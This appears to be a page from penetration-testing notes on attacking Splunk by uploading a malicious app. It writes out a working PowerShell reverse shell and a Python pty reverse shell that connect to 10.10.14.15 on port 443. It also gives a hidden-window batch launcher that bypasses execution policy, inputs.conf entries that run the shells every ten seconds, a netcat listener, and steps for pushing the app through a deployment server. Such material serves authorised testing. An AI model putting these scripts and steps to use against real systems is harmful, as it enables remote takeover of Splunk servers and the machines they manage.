12.-Attacking-splunk

1. Create Splunk App Directory Structure

Create the necessary directory structure for the Splunk application:

mkdir -p splunk_shell/splunk_shell/bin
mkdir -p splunk_shell/splunk_shell/default
tree splunk_shell/splunk_shell/

2. Create PowerShell Reverse Shell (Windows)

Create a PowerShell script to establish a reverse shell connection:

File: splunk_shell/splunk_shell/bin/rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

3. Create a Batch File to Execute PowerShell (Windows)

File: splunk_shell/splunk_shell/bin/run.bat

@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit

4. Create Splunk App Configuration (Windows)

Configure Splunk to execute the batch file at regular intervals.

File: splunk_shell/splunk_shell/default/inputs.conf

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

5. Package the Splunk App

Create a compressed tar archive for easy deployment:

tar -cvzf updater.tar.gz splunk_shell/splunk_shell/

6. Set Up a Netcat Listener

Start a listener on port 443 to capture the reverse shell:

sudo nc -lnvp 443

7. Upload the Splunk App

Navigate to "Apps" -> "Manage Apps" -> "Install app from file" in Splunk Web UI.
Upload updater.tar.gz.

8. Create Python Reverse Shell (Linux)

For Linux systems, create a Python-based reverse shell script.

File: splunk_shell/splunk_shell/bin/rev.py

import sys, socket, os, pty

ip = "10.10.14.15"
port = 443
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

9. Create Splunk App Configuration (Linux)

File: splunk_shell/splunk_shell/default/inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

10. Deploy the App to Splunk Deployment Server

Windows Deployment Server:

Copy updater.tar.gz to the deployment apps directory:

cp updater.tar.gz $SPLUNK_HOME/etc/deployment-apps/

Restart Splunk:

splunk restart

Linux Deployment Server:

Copy updater.tar.gz to the deployment apps directory:

cp updater.tar.gz $SPLUNK_HOME/etc/deployment-apps/

Restart Splunk:

sudo systemctl restart splunk

11. Validate Shell Access

After gaining shell access, check the following:

whoami
hostname
pwd

Key Considerations

Ensure Netcat listener is active before running the scripts.
Modify the IP address and port in scripts based on your setup.
Use caution when testing on production systems.
Disable PowerShell execution policies if needed.

This guide provides a structured method for setting up a Splunk-based reverse shell for penetration testing and security research purposes.

Previous11.-Aplunk-discovery-and-enumeration Next13.Prtg-network-monitor

Last updated 12 days ago

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()